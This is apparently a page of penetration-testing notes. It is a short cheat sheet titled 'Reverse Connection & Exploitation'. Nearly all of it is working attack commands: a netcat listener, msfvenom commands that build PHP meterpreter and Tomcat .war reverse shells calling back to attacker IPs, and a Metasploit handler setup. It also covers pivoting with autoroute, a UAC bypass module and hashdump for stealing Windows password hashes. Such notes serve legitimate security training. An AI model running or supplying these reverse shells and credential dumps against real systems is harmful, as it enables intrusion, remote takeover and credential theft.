π―Reverse Connection & Exploitation
Netcat
Basic Netcat Command
nc -lnvp <port> [In the Attacker Machine]
Metasploit
Generate PHP reverse shell [msfvenom]
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.0.1 lport=4444 -o meterpreter.php
$ msfconsole
msf5> use exploit/multi/handler
msf5 exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf5 exploit(handler)> set payload php/meterpreter_reverse_tcp
msf5 exploit(handler)> set lhost 192.168.0.1
msf5 exploit(handler)> set lport 4444
msf5 exploit(handler)> exploitAdd routing protocols in msfconsole
meterpreter> run autoroute -s 172.16.50.0/24
Use SSH Bruteforce in msfconsole
View Active sessions
Using sessions command
Interact with sessions using
sessions -i <number>
Background a shell using meterpreter> background command
Note that in modern Windows Operating systems, the User Account Control policy prevents privilege escalation.
Bypassing UAC
You can bypass that restriction by using the bypassuac module.
Dumping the Password Database
For example, you can dump the passwords database and save it for an offline cracking session. The hashdump module dumps the password database of a Windows machine
meterpreter > hashdump
msfvenom
Generate .war file for Apache Tomcat reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.64.10 LPORT=4444 -f war > reverse.war
Collection of Reverse shell [Commands]
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md
Last updated
Was this helpful?